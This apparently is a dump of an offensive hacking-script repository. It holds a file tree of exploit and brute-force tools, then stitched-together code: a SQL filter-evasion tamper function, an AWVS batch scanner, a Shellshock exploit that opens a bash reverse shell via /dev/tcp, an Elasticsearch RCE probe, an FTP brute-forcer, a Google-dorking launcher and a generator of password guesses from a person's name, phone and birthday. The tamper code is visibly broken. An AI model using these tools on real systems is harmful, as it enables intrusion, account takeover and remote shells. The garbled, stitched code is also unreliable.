├── 1.py ├── AWVS11批量添加扫描.py ├── Apache Tomcat爆破.py ├── Awvs-Automation ├── Awvs.py ├── README.md ├── WCSpider │ ├── README.md │ ├── WCSpider.py │ └── WooyunCompany20160316.txt ├── cmdline.py ├── conf.py ├── parsexml.py └── sendmail.py ├── CTF ├── CSRFTester-1.0 │ ├── OWASP-CSRFTester-1.0.jar │ ├── lib │ │ └── concurrent.jar │ └── run.bat └── CTF.txt ├── CVE-2014-6271-master ├── README.md └── shellpoc.py ├── CVE-2017-0213--master └── README.md ├── DBSQL.rar ├── ElasticSearch远程任意代码执行漏洞利用工具(CVE-2014-3120) ├── check.py └── exp.py ├── FTP暴力破解工具多线程版.py ├── FTP暴力破解脚本.py ├── Goohak ├── README.md └── goohak ├── IISRCE-CVE-2017-7269 检测工具 └── IISRCE-CVE-2017-7269.exe ├── Invoke-NetMonKey.ps1 ├── MS16-032-master ├── README.md ├── ms16-032.png ├── ms16-032.sln └── ms16-032 │ ├── ms16-032.cpp │ ├── ms16-032.vcxproj │ ├── ms16-032.vcxproj.filters │ └── ms16-032.vcxproj.user ├── Mdic.py ├── NTFS交换数据流检测工具.rar ├── Python3写的ZoomEye查询脚本.py ├── PythonSpider-BeeBeeto ├── BeeBeetoSpider.py ├── BeeBeetoSpider02.py ├── BeeBeetoSpider03.py └── README.MD ├── PythonSpider-Wooyun ├── IVSpider-Wooyun │ ├── IVSpider.py │ ├── IVSpider02.py │ ├── README.md │ └── cmdline.py ├── README.md └── WVSearch │ ├── README.md │ ├── WVSearch.py │ ├── cmdline.py │ ├── report.py │ └── report │ └── .gitigonre ├── QQDataSearcher.rar ├── SSH暴力破解.py ├── Smbscan ├── Smbtouch-1.1.1.0.xml ├── Smbtouch-1.1.1.fb ├── Smbtouch-1.1.1.xml ├── cmd.cmd ├── ip.txt ├── ips.txt ├── pytrch.py ├── pytrch.pyc └── smbscan.py ├── Struts2多个漏洞的批量验证+利用集成版(py).py ├── TELNET暴力破解.py ├── WebAdminLoginFinder.py ├── ZoomEye_API搜索脚本修改优化版.py ├── adminfinder.py ├── cc.py ├── cgi.py ├── com_user server scanner.py ├── curl_flood.txt ├── dumpdz.zip ├── findip.py ├── firefox_security_toolkit.sh ├── git-all-secrets-master ├── .gitignore ├── Dockerfile ├── LICENSE ├── README.md ├── main.go ├── rungitsecrets.sh └── thog │ ├── .gitignore │ ├── requirements.txt │ ├── setup.cfg │ ├── setup.py │ └── truffleHog │ ├── __init__.py │ └── truffleHog.py ├── 
httpscan.py ├── ip-location ├── LICENSE ├── Mobile_Detect.php ├── README.md └── ip.php ├── ip2geo.py ├── ip地址精准定位.py ├── ip物理地址定位.py ├── kali-tools-master ├── .gitignore ├── LICENCE ├── README.md ├── data.py ├── demo1.png ├── demo2.png ├── helpers.py └── kali.py ├── lcy ├── exploits │ ├── server │ │ ├── __init__.py │ │ ├── __init__.pyc │ │ ├── redis_remote.py │ │ └── redis_remote.pyc │ └── website │ │ ├── Disucz3_flvplayer_swf_xss.py │ │ ├── Disucz3_flvplayer_swf_xss.pyc │ │ ├── __init__.py │ │ ├── dedecms_mysql_error_trace_inc.py │ │ ├── dedecms_mysql_error_trace_inc.pyc │ │ ├── dedecms_search_php_sql_inject.py │ │ ├── dedecms_search_php_sql_inject.pyc │ │ ├── dedecms_swfupload_xss.py │ │ ├── dedecms_swfupload_xss.pyc │ │ ├── http_sys.py │ │ ├── http_sys.pyc │ │ ├── redis_remote.py │ │ ├── svn_information_disclosure.py │ │ ├── svn_information_disclosure.pyc │ │ ├── webserver_Parsing_vulnerability.py │ │ └── webserver_Parsing_vulnerability.pyc ├── lcy.py ├── lib │ ├── Color.py │ ├── Color.pyc │ ├── __init__.py │ ├── __init__.pyc │ ├── consle_width.py │ ├── consle_width.pyc │ ├── framework.py │ ├── framework.pyc │ ├── util.py │ ├── util.pyc │ ├── work.py │ └── work.pyc └── result │ ├── 20160921_25872.html │ ├── 20160921_3030.html │ ├── 20160921_35187.html │ ├── 20160921_4838.html │ ├── 20160921_74289.html │ ├── 20160921_76544.html │ └── 20160921_84164.html ├── ldap匿名访问检测脚本.py ├── ms17010 ├── IpScanResult.txt ├── go.bat ├── ip.txt ├── ms.exe ├── ms17010.jar └── readme.txt ├── mysql.php ├── nopetyavac.bat ├── nsa应急策略.bat ├── petya系列勒索木马免疫脚本.bat ├── phpcms_getshell.exe ├── plink用法.txt ├── portscan.py ├── python二级域名批量采集脚本 ├── getsubdomain.pdf └── getsubdomain.py ├── python抓取谷歌链接工具 ├── getlink.pdf └── getlink.py ├── python未授权访问提取特定数据脚本.py ├── python版本的小葵转换工具.py ├── qq.rar ├── qq群社工库处理.txt ├── qunlist.bat ├── redis未授权扫描 └── redis-test.py ├── runassystem权限小工具.bat ├── s2批量检测.py ├── sgk数据清洗 ├── BigDupRemove.zip ├── es_import-master │ ├── .gitignore │ ├── LICENSE │ ├── 
README.md │ └── es_import.py ├── quchong.py ├── 去重.py ├── 去重可排序.py ├── 文本去重.py └── 文本去重工具.exe ├── smtp爆破脚本.py ├── struts2 ├── St2关键词.txt ├── Struts2多版本一次性检测工具V3.0.jar ├── s02-46命令执行支持ssl_python源码.py ├── s2-045 POC │ └── HttpCodeLib.dll ├── s2-045.py ├── s2-046.sh ├── s2-046源码 │ ├── s2-045.sln │ ├── s2-045.v12.suo │ └── s2-045 │ │ ├── Form1.Designer.cs │ │ ├── Form1.cs │ │ ├── Form1.resx │ │ ├── Program.cs │ │ ├── Properties │ │ ├── AssemblyInfo.cs │ │ ├── Resources.Designer.cs │ │ ├── Resources.resx │ │ ├── Settings.Designer.cs │ │ └── Settings.settings │ │ ├── obj │ │ ├── Debug │ │ │ ├── DesignTimeResolveAssemblyReferences.cache │ │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ │ ├── s2-045.csproj.FileListAbsolute.txt │ │ │ ├── s2-045.csproj.GenerateResource.Cache │ │ │ ├── s2-045.csprojResolveAssemblyReference.cache │ │ │ ├── s2-045.exe │ │ │ ├── s2-045.pdb │ │ │ ├── s2_045.Form1.resources │ │ │ └── s2_045.Properties.Resources.resources │ │ └── Release │ │ │ ├── DesignTimeResolveAssemblyReferences.cache │ │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ │ ├── s2-045.csproj.FileListAbsolute.txt │ │ │ ├── s2-045.csproj.GenerateResource.Cache │ │ │ ├── s2-045.csprojResolveAssemblyReference.cache │ │ │ ├── s2-045.exe │ │ │ ├── s2-045.pdb │ │ │ ├── s2_045.Form1.resources │ │ │ └── s2_045.Properties.Resources.resources │ │ └── s2-045.csproj ├── s2045一键getshell │ ├── pi_struts2-045.py │ ├── readme.txt │ ├── tmp.txt │ └── url.txt ├── s2getshell.py ├── st2-046-poc │ ├── README.MD │ ├── exploit-cd.sh │ ├── reqnull.txt │ ├── st2-046.jpg │ └── st2-046.png ├── str2-045.txt ├── struts2_045 多线程批量检测脚本.py └── 熟练利用google,shodan及bing hacking辅助快速渗透[主要针对大型目标].txt ├── struts2批量查询.py ├── t00lsAddTu ├── config.py ├── config.pyc ├── discuz.py ├── discuz.pyc └── login.py ├── url.py ├── weakfilescan.txt ├── webshell下远程连接linux服务器并执行命令工具 ├── plink.exe └── plink用法.txt ├── windows-exploit-suggester.py ├── 一个小脚本查看PC连接过的WIFI密码.bat ├── 一些命令.txt ├── 
def tamper(payload, **kwargs):
    """
    Replaces space character (' ') with the inline comment sequence ('/**)*/')

    >>> tamper('SELECT id FROM users')
    'SELECT/**)*/id/**)*/FROM/**)*/users'

    Relevance for defenders: an input filter that keys on literal whitespace
    between SQL keywords does not match text transformed this way. Strip or
    normalise SQL comments before pattern matching, and rely on parameterised
    queries rather than on keyword filtering.
    """

    # Falsy input (None or "") is returned unchanged.
    retVal = payload

    if payload:
        retVal = ""
        # quote / doublequote track whether the scan is inside a quoted literal,
        # so that spaces inside string literals are left alone.
        quote, doublequote, firstspace = False, False, False

        # NOTE(review): as listed, every test below inspects the whole `payload`
        # string on each iteration and the loop variable `i` is never used, so
        # this listing does not produce the doctest output above. Compare with
        # the upstream file before relying on it.
        for i in xrange(len(payload)):
            if not firstspace:
                if payload.isspace():
                    firstspace = True
                    retVal += "/**)*/"
                    continue

            elif payload == '\'':
                quote = not quote

            elif payload == '"':
                doublequote = not doublequote

            elif payload == " " and not doublequote and not quote:
                retVal += "/**)*/"
                continue

            retVal += payload

    return retVal
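class ScanThread(Thread):
    """Worker thread: take URLs from url_queue, scan each one and mail the findings.

    Each URL is passed to wvs_scan(), which returns "<exit code>|<save path>".
    When the exit code is greater than zero the exported XML report in the save
    path is parsed and its summary is mailed to mail_list.
    """

    def __init__(self):
        Thread.__init__(self)

    def run(self):
        # Local import: the file only imports Queue from this module.
        from Queue import Empty

        while True:
            # get_nowait() removes the gap between empty() and get(): with several
            # workers another thread could take the last URL in between, leaving
            # this one blocked in get() forever.
            try:
                scan_url = url_queue.get_nowait()
            except Empty:
                break

            try:
                scan_result = wvs_scan(scan_url)
                # Split once only: the save path is built from the URL and may
                # itself contain '|'.
                code, save_load = scan_result.split('|', 1)
                # The exit code comes back as text; comparing a str with 0 is
                # always true on Python 2, so convert it before testing.
                if int(code) > 0:
                    xml_result = parse_xml(save_load + '\\export.xml')
                    # Join the report lines with newlines to form the mail body.
                    send_main(mail_list, 'WvsScanner Report--' + scan_url, '\n'.join(xml_result))
            finally:
                # Mark the item done even when scanning or reporting raised, so
                # the queue's unfinished-task count stays accurate.
                url_queue.task_done()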
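def url_res(url):
    """Fetch *url* with a randomly chosen browser User-Agent and return the response.

    The request is retried a bounded number of times with a growing pause
    between attempts. The previous unbounded ``while True`` retry never
    returned when the site was permanently unreachable and re-sent requests
    without any delay.

    Raises:
        The exception from the last attempt, once all attempts have failed.
    """
    # Pick one User-Agent per call so the request looks like a regular browser.
    user_agent = ["Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0",
                  "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
                  "Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
                  "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11",
                  "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)"]
    req = urllib2.Request(url)
    req.add_header('User-Agent', random.choice(user_agent))

    max_attempts = 5
    for attempt in range(1, max_attempts + 1):
        try:
            # A timeout keeps a stalled connection from blocking the crawl forever.
            return urllib2.urlopen(req, timeout=30)
        except Exception:
            if attempt == max_attempts:
                raise
            # Back off a little longer after each failure.
            time.sleep(attempt)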
def save_result(company):
    """Append one company name, followed by a newline, to today's report file.

    The file is created in the current working directory and its name carries
    the local date (YYYYMMDD).
    """
    date_stamp = time.strftime('%Y%m%d', time.localtime())
    report_path = 'WooyunCompany' + date_stamp + '.txt'
    with open(report_path, 'a+') as report:
        report.write(company + '\n')
# Path to wvs_console.exe. The trailing space separates the executable from the
# scan arguments that are appended to it.
# NOTE(review): the path contains spaces and is not quoted; confirm how the
# command string built from it is launched.
wvs_console = r'H:\Web Vulnerability Scanner 10\wvs_console.exe '

# Directory where scan records are saved. The original author doubled the final
# backslash so that it does not escape the closing quote; in a raw string both
# backslashes are kept.
save_folder = r'H:\Awvs\Result\\'

# Text file holding the URLs to scan.
url_txt = r'H:\Awvs\Url\1_url.txt'

# wvs scan arguments: do not scan directories above the start folder (effective
# for second-level directories) and use heuristic scanning mode.
scan_command = "/Scan %s /Profile default /ExportXML /SaveFolder %s --RestrictToBaseFolder=true " \
               "--ScanningMode=Heuristic"

# Mail settings.
# NOTE(review): the account name and password live in source here. Keep real
# values out of version control (environment variable or an untracked local
# file) and use a dedicated sending account.
mail_host = "smtp.163.com"
mail_user = "123"  # sender account
mail_pass = "123"  # sender password
mail_postfix = "163.com"
mail_list = ['123@qq.com']  # recipients
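def send_main(to_mail, title, content):
    """Send a plain-text UTF-8 mail and report whether it was accepted.

    Args:
        to_mail: list of recipient addresses.
        title: subject line.
        content: message body.

    Returns:
        True when the server accepted the message, False otherwise. Any error
        is written to the error log through catch_write().

    The session is upgraded with STARTTLS before logging in, so the account
    password and the scan report are not sent over the network in clear text.
    If the server does not offer STARTTLS the mail is not sent.
    """
    from_mail = "WvsScanner<" + mail_user + "@" + mail_postfix + ">"
    msg = MIMEText(content, _subtype='plain', _charset='utf-8')
    msg['Subject'] = title
    msg['From'] = from_mail
    # Address lists in a To header are comma separated; ';' is not a valid separator.
    msg['To'] = ", ".join(to_mail)

    server = smtplib.SMTP()
    try:
        server.connect(mail_host)
        server.ehlo()
        if not server.has_extn('starttls'):
            raise smtplib.SMTPException('server does not offer STARTTLS, refusing to log in over clear text')
        # NOTE(review): starttls() without an SSL context may not verify the
        # server certificate, depending on the Python version - confirm.
        server.starttls()
        # The extension list has to be requested again on the encrypted channel.
        server.ehlo()
        server.login(mail_user, mail_pass)
        server.sendmail(from_mail, to_mail, msg.as_string())
        return True
    except Exception as e:
        catch_write(str(e))
        return False
    finally:
        # Close the connection on the failure path as well as on success.
        server.close()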
def catch_write(err_code):
    """Append a timestamped error line to mail_error.txt in the working directory.

    Each line has the form "<YYYY-mm-dd HH:MM:SS><TAB><err_code>".
    """
    stamp = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())
    entry = '\t'.join((stamp, err_code)) + '\n'
    with open("mail_error.txt", 'a') as log:
        log.write(entry)
# Proof of concept for CVE-2014-6271 (Shellshock) against a CGI endpoint.
#
# For defenders:
#   * The fix is a patched bash. Hosts where CGI programs (or anything they
#     spawn) run under bash stay exposed until it is updated.
#   * The request is recognisable on the wire: a header value that begins with
#     the function-definition prefix "() {". Alert on that prefix in any request
#     header, not only in the custom "test" header used here.
#   * Outbound connections initiated by the web server account right after such
#     a request are a strong indicator of successful exploitation.
if (len(sys.argv)<4):
    print "Usage: %s " % sys.argv[0]
    print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
    exit(0)

# sys.argv[1] is the HTTP host, sys.argv[2] the CGI path, sys.argv[3] an
# "address/port" pair that is interpolated into the header value below.
conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

# The value travels in an arbitrary request header; a CGI server exposes request
# headers to the script as environment variables, which is where a vulnerable
# bash evaluates the text that follows the function definition.
headers = {"Content-type": "application/x-www-form-urlencoded",
    "test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
# Only the HTTP status and body are printed; they do not by themselves show
# whether the target was vulnerable.
print res.status, res.reason
data = res.read()
print data
def check(ip):
    # Probe one host for CVE-2014-3120: ask Elasticsearch on port 9200 to
    # evaluate a harmless script expression through `script_fields` and report
    # the host when the response carries the evaluated field.
    #
    # For defenders: Elasticsearch releases before 1.2 enable dynamic scripting
    # by default. Upgrade, or set `script.disable_dynamic: true`, and do not
    # expose port 9200 to untrusted networks. The probe is visible in request
    # logs as a `_search?source=` query containing `script_fields`.
    ip=ip
    # NOTE: setdefaulttimeout() changes the timeout for every socket in the
    # process, not only for this request.
    socket.setdefaulttimeout(3)
    try:
        rs = urllib.urlopen('http://'+'%s'% ip +':9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22t%22:{%22script%22:%22Integer.toHexString(31415926)%22}}}}')
        rs = rs.read()
        rs = simplejson.loads(rs)
    except:
        # NOTE(review): bare except hides every failure (connection refused,
        # timeout, invalid JSON). When the request fails `rs` stays unbound and
        # the NameError raised below is swallowed by the second bare except.
        pass
    try:
        # Only the presence of the `t` field is tested; its value is not
        # compared with the expected result of the expression.
        for t in rs['hits']['hits'][0]['fields']['t']:
            t=t
    except:
        pass
    else:
        print 'found vul host : %s' % ip
def brute_users(user, pwd):
    # Try one user name / password pair against the FTP service on port 21 of
    # the module-level `host` and print the pair when login and a directory
    # listing both succeed.
    #
    # For defenders: this shows up as a burst of failed logins (FTP reply 530)
    # from one source across many accounts. Rate limiting, lockout after
    # repeated failures and alerting on that pattern counter it. Plain FTP also
    # carries credentials in clear text; prefer FTPS or SFTP.
    try:
        ftp = ftplib.FTP()
        ftp.connect(host, 21, timeout=10)
        ftp.login(user, pwd)
        ftp.retrlines('LIST')
        ftp.quit()
        print '\n[+] 破解成功,用户名:%s 密码:%s\n' % (user, pwd)
    except ftplib.all_errors:
        # NOTE(review): every ftplib error is discarded, so a refused
        # connection or a server-side block looks the same as a wrong password.
        pass
6 | 7 | ## DEPENDENCIES: 8 | * iceweasel 9 | * Linux 10 | 11 | ## USAGE: 12 | ``` 13 | ./goohak domain.com 14 | ``` 15 | -------------------------------------------------------------------------------- /Goohak/goohak: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # + -- --=[GooHak v1.5 by 1N3 3 | # + -- --=[http://crowdshield.com 4 | # 5 | # ABOUT: 6 | # GooHak is a shell script to automatically launch google hacking queries against a target domain to find vulnerabilities and enumerate a target. 7 | # 8 | # DEPENDENCIES: 9 | # iceweasel 10 | # Linux 11 | 12 | TARGET="$1" 13 | OKBLUE='\033[94m' 14 | OKRED='\033[91m' 15 | OKGREEN='\033[92m' 16 | OKORANGE='\033[93m' 17 | RESET='\e[0m' 18 | 19 | if [ -z $TARGET ]; then 20 | echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET" 21 | echo -e "$OKORANGE + -- --=[GooHak v1.5 by 1N3$RESET" 22 | echo -e "$OKORANGE + -- --=[Usage: goohak $RESET" 23 | exit 24 | fi 25 | 26 | iceweasel 2> /dev/null & 27 | sleep 5 28 | 29 | # LOAD WEBSITE IN A WEB BROSER 30 | iceweasel http://$TARGET 2> /dev/null 31 | iceweasel https://$TARGET 2> /dev/null 32 | # TCPUTILS 33 | iceweasel http://www.tcpiputils.com/browse/domain/$TARGET 2> /dev/null 34 | # NETCRAFT 35 | iceweasel http://toolbar.netcraft.com/site_report?url=$TARGET 2> /dev/null 36 | # SHOWDAN 37 | iceweasel https://www.shodan.io/search?query=$TARGET 2> /dev/null 38 | # CENSYS 39 | iceweasel https://www.censys.io/ipv4?q=$TARGET 2> /dev/null 40 | # CRT.SH 41 | iceweasel https://crt.sh/?q=%25.$TARGET 2> /dev/null 42 | # ZONE-H 43 | iceweasel "https://www.google.ca/search?q=site:zone-h.org+$TARGET" 2> /dev/null 44 | # XSSPOSED 45 | iceweasel "https://www.xssposed.org/search/?search=$TARGET&type=host" 2> /dev/null 46 | # PUNKSPIDER 47 | iceweasel "https://securityheaders.io/?q=$TARGET" 2> /dev/null 48 | # SSLLABS 49 | iceweasel https://www.ssllabs.com/ssltest/analyze.html?d=$TARGET 2> /dev/null 50 | # HEADER CHECK 51 | iceweasel 
https://securityheaders.io/?q=$TARGET 2> /dev/null 52 | 53 | sleep 30 54 | 55 | # FIND LOGIN PAGES: 56 | iceweasel "https://www.google.ca/search?q=site:$TARGET+username+OR+password+OR+login+OR+root+OR+admin" 2> /dev/null 57 | # SEARCH FOR BACKDOORS: 58 | iceweasel "https://www.google.ca/search?q=site:$TARGET+inurl:shell+OR+inurl:backdoor+OR+inurl:wso+OR+inurl:cmd+OR+shadow+OR+passwd+OR+boot.ini+OR+inurl:backdoor" 2> /dev/null 59 | # FIND SETUP OR INSTALL FILES: 60 | iceweasel "https://www.google.ca/search?q=site:$TARGET+inurl:readme+OR+inurl:license+OR+inurl:install+OR+inurl:setup+OR+inurl:config" 2> /dev/null 61 | # FIND WORDPRESS PLUGINS/UPLOADS/DOWNLOADS: 62 | iceweasel "https://www.google.ca/search?q=site:$TARGET+inurl:wp-+OR+inurl:plugin+OR+inurl:upload+OR+inurl:download" 2> /dev/null 63 | # FIND OPEN REDIRECTS: 64 | iceweasel "https://www.google.ca/search?q=site:$TARGET+inurl:redir+OR+inurl:url+OR+inurl:redirect+OR+inurl:return+OR+inurl:src=http+OR+inurl:r=http" 2> /dev/null 65 | # FIND FILES BY EXTENSION: 66 | iceweasel "https://www.google.ca/search?q=site:$TARGET+ext:cgi+OR+ext:php+OR+ext:asp+OR+ext:aspx+OR+ext:jsp+OR+ext:jspx+OR+ext:swf+OR+ext:fla+OR+ext:xml" 2> /dev/null 67 | # FIND DOCUMENTS BY EXTENSION: 68 | iceweasel "https://www.google.ca/search?q=site:$TARGET+ext:doc+OR+ext:docx+OR+ext:csv+OR+ext:pdf+OR+ext:txt+OR+ext:log+OR+ext:bak" 2> /dev/null 69 | # FIND APACHE STRUTS RCE's: 70 | iceweasel "https://www.google.ca/search?q=site:$TARGET+ext:action+OR+struts" 2> /dev/null 71 | # FIND PASTEBIN POSTS FOR DOMAIN: 72 | iceweasel "https://www.google.ca/search?q=site:pastebin.com+$TARGET" 2> /dev/null 73 | # FIND EMPLOYEES ON LINKEDIN: 74 | iceweasel "https://www.google.ca/search?q=site:linkedin.com+employees+$TARGET" 2> /dev/null 75 | 76 | -------------------------------------------------------------------------------- /IISRCE-CVE-2017-7269 检测工具/IISRCE-CVE-2017-7269.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/IISRCE-CVE-2017-7269 检测工具/IISRCE-CVE-2017-7269.exe -------------------------------------------------------------------------------- /MS16-032-master/README.md: -------------------------------------------------------------------------------- 1 | # MS16-032(CVE-2016-0099) for SERVICE ONLY 2 | 3 | **this exploit can only use on SERVICE** 4 | 5 | do logical exploit,on logical exploits. 6 | 7 | -------------------------------------------------------------------------------- /MS16-032-master/ms16-032.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/MS16-032-master/ms16-032.png -------------------------------------------------------------------------------- /MS16-032-master/ms16-032.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2013 4 | VisualStudioVersion = 12.0.21005.1 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ms16-032", "ms16-032\ms16-032.vcxproj", "{90842927-6D62-4465-93A3-37FC28C12018}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Release|Win32 = Release|Win32 11 | Release|x64 = Release|x64 12 | Release64|Win32 = Release64|Win32 13 | Release64|x64 = Release64|x64 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {90842927-6D62-4465-93A3-37FC28C12018}.Release|Win32.ActiveCfg = Release|Win32 17 | {90842927-6D62-4465-93A3-37FC28C12018}.Release|Win32.Build.0 = Release|Win32 18 | {90842927-6D62-4465-93A3-37FC28C12018}.Release|x64.ActiveCfg = Release|Win32 19 | {90842927-6D62-4465-93A3-37FC28C12018}.Release|x64.Build.0 = Release|Win32 20 | 
{90842927-6D62-4465-93A3-37FC28C12018}.Release64|Win32.ActiveCfg = Release64|Win32 21 | {90842927-6D62-4465-93A3-37FC28C12018}.Release64|Win32.Build.0 = Release64|Win32 22 | {90842927-6D62-4465-93A3-37FC28C12018}.Release64|x64.ActiveCfg = Release64|x64 23 | {90842927-6D62-4465-93A3-37FC28C12018}.Release64|x64.Build.0 = Release64|x64 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | EndGlobal 29 | -------------------------------------------------------------------------------- /MS16-032-master/ms16-032/ms16-032.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/MS16-032-master/ms16-032/ms16-032.cpp -------------------------------------------------------------------------------- /MS16-032-master/ms16-032/ms16-032.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 源文件 23 | 24 | 25 | -------------------------------------------------------------------------------- /MS16-032-master/ms16-032/ms16-032.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /Mdic.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | print '姓名是三字或更多,请在名后面加-,在-后面添加名的首字母,比如姓名:wangbadan:' 3 | print '姓:wang' 4 | print '名:badan-bd' 5 | print '2字正常输入就可以了' 6 | 7 | #信息设置区 8 | 9 | str1 = 
raw_input('姓:') 10 | str2 = raw_input('名:') 11 | str3 = raw_input('手机:') 12 | str4 = raw_input('QQ:') 13 | str5 = str(raw_input('年月日(19890507):')) 14 | str6 = raw_input('域名(www.baidu.com):') 15 | str7 = ('123','123456','000','666','888','8888','888888','123..','!@#','~!@','~!@#','issb','likemakelove','iloveyou','loveyou','admin','system','gl','guanli','manager')#可自行添加 16 | arr1 = {1:'!',2:'@',3:'#',4:'$',5:'%',6:'^',7:'&',8:'*',9:'(',0:')'} 17 | dic = [] 18 | tdic = [] 19 | ttdic = [] 20 | tttdic = [] 21 | 22 | #信息加工区 23 | 24 | if str1!="": 25 | str1_a=str1[:1] #截取姓首字母 26 | else: 27 | print("必须输入姓") 28 | if str2!="": 29 | if str2.find('-')>0: 30 | str2_a=str2[str2.find('-')+1:] 31 | str2=str2[:str2.find('-')] 32 | else: 33 | str2_a=str2[:1] #截取名首字母 34 | if str3!="": 35 | str3_a=str3[-8:] #截取后8位 36 | str3_b=str3[-6:] #截取后6位 37 | str3_c=str3[:6] #截取前6位 38 | else: 39 | print("必须输入手机或座机") 40 | if str5!="": 41 | str5_a=str5[:4] #截取前4为,年 42 | str5_b=str5[4:8] #截取5-8位,月日 43 | for i in str5_a: 44 | tdic.append(arr1[int(i)]) #年对应符号,eg:1986==!(*^ 45 | tt=',' 46 | str5_a1=tt.join(tdic) 47 | for i in str5_b: 48 | ttdic.append(arr1[int(i)]) #月日对应符号 49 | tt=',' 50 | str5_b1=tt.join(ttdic) 51 | for i in str5_b.strip('0'): 52 | tttdic.append(arr1[int(i)]) #没有0的月日对应符号 53 | tt=',' 54 | str5_b2=tt.join(tttdic) 55 | if str6!="": 56 | t1=str6.strip('http://').split('.') #去除[http://]并已点分割域名 57 | if t1[0]=='www': 58 | str6_a='' #如果二级域名是www清除 59 | str6_b=t1[1] #截取主域名字符 60 | str6_c=t1[2] #截取域名后缀 61 | else: 62 | str6_a=t1[0] #截取二级域名 63 | str6_b=t1[1] #截取主域名字符 64 | str6_c=t1[2] #截取域名后缀 65 | 66 | #手写规则区 67 | 68 | dic.append(str1+str3) #姓加手机 69 | dic.append(str1+str3_a) #姓名加手机后8位 70 | dic.append(str1+str3_b) #姓名加手机后6为 71 | dic.append(str1+str3_c) #姓名加手机前6位 72 | dic.append(str1+str4) #姓加QQ 73 | dic.append(str1+str5) #姓加生日 74 | dic.append(str1+str5[2:]) #姓名加生日不要前2位 75 | dic.append(str1+str5_a+str5_b.replace('0','')) #姓加生日,日月没0 76 | dic.append(str1+str5_a) #姓名加年 77 | dic.append(str1+str5_b) #姓加月日 
78 | dic.append(str1+str5_b.replace('0','')) #姓加日月没0 79 | # 80 | dic.append(str1+str2) #姓名 81 | dic.append(str1+str2+str3) #姓名加手机 82 | dic.append(str1+str2+str3_a) #姓名加手机后8位 83 | dic.append(str1+str2+str3_b) #姓名加手机后6为 84 | dic.append(str1+str2+str3_c) #姓名加手机前6位 85 | dic.append(str1+str2+str4) #姓名加QQ 86 | dic.append(str1+str2+str5) #姓名加生日 87 | dic.append(str1+str2+str5[2:]) #姓名加生日不要前2位 88 | dic.append(str1+str2+str5_a) #姓名加年 89 | dic.append(str1+str2+str5_b) #姓名加月日 90 | dic.append(str1+str2+str5_b.replace('0','')) #姓名加月日没有0 91 | dic.append(str1+str2+str5_a1) #姓名加年对应符号 92 | dic.append(str1+str2+str5_b1) #姓名加日月对应符号 93 | dic.append(str1+str2+str5_b2) #姓名加日月对应符号没有0 94 | dic.append(str1+str2+str6_a) #姓名加二级域名 95 | dic.append(str1+str2+str6_b) #姓名加主域名字符 96 | # 97 | dic.append(str1_a+str2_a+str3) #姓名首字母加手机 98 | dic.append(str1_a+str2_a+str3_a) #姓名首字母加手机后8位 99 | dic.append(str1_a+str2_a+str3_b) #姓名加字母手机后6为 100 | dic.append(str1_a+str2_a+str3_c) #姓名加字母手机前6位 101 | dic.append(str1_a+str2_a+str4) #姓名首字母加QQ 102 | dic.append(str1_a+str2_a+str5) #姓名首字母加生日 103 | dic.append(str1_a+str2_a+str5[2:]) #姓名首字母加生日不要前2位 104 | dic.append(str1_a+str2_a+str5_a) #姓名首字母加年 105 | dic.append(str1_a+str2_a+str5_b) #姓名首字母加月日 106 | dic.append(str1_a+str2_a+str5_b.replace('0',''))#姓名首字母加月日没有0 107 | dic.append(str1_a+str2_a+str5_a1) #姓名首字母加年对应符号 108 | dic.append(str1_a+str2_a+str5_b1) #姓名首字母加日月对应符号 109 | dic.append(str1_a+str2_a+str5_b2) #姓名首字母加日月对应符号没有0 110 | dic.append(str1_a+str2_a+str6_a) #姓名首字母加二级域名 111 | dic.append(str1_a+str2_a+str6_b) #姓名首字母加主域名字符 112 | 